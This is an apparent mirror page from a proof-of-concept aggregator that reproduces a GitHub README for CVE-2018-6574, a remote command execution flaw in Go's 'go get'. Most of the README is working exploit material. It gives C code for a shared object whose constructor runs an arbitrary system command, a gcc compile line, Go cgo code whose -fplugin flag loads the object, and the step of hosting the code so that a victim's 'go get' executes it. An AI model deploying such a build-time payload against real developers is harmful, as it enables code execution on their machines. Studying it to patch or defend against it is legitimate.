CVE-2018-6574 PoC — Google Go 安全漏洞

Source

https://github.com/ItsFadinG/CVE-2018-6574

Associated Vulnerability

Title:Google Go 安全漏洞 (CVE-2018-6574)
Description:Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked.

Readme

# CVE-2018-6574 POC

Exploit POC For CVE-2018-6574

## Compile

1. Create an exploit file with the following:
```c
#include<stdio.h>
#include<stdlib.h>

static void malicious() __attribute__((constructor));

void malicious() {
    system("COMMAND");
}
```
2. Compile it:
```bash
gcc -shared -o exploit.so -fPIC exploit.c
```
3. Finally, you need the go code that will tell cgo to use your plugin:
```go
package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int
// bridge_int_func(intFunc f)
// {
//      return f();
// }
//
// int fortytwo()
// {
//      return 42;
// }
import "C"
import "fmt"

func main() {
    f := C.intFunc(C.fortytwo)
    fmt.Println(int(C.bridge_int_func(f)))
    // Output: 42
}
```
4. then host in a github and run it to gain command Execution:
```bash
go get github.com/your-repo/CVE-2018-6574-POC
```

## VERSION

- before 1.8.7
- before 1.9.4
- before Go 1.10rc2

## Refrences

- https://nvd.nist.gov/vuln/detail/CVE-2018-6574
- http://blog.nsfocus.net/cve-2018-6574/

File Snapshot


 [4.0K]  /data/pocs/cc1348097b2c7b94cb552a90f8d398adc30f8991
├── [ 187]  exploit.c
├── [ 16K]  exploit.so
├── [ 334]  main.go
└── [1.0K]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!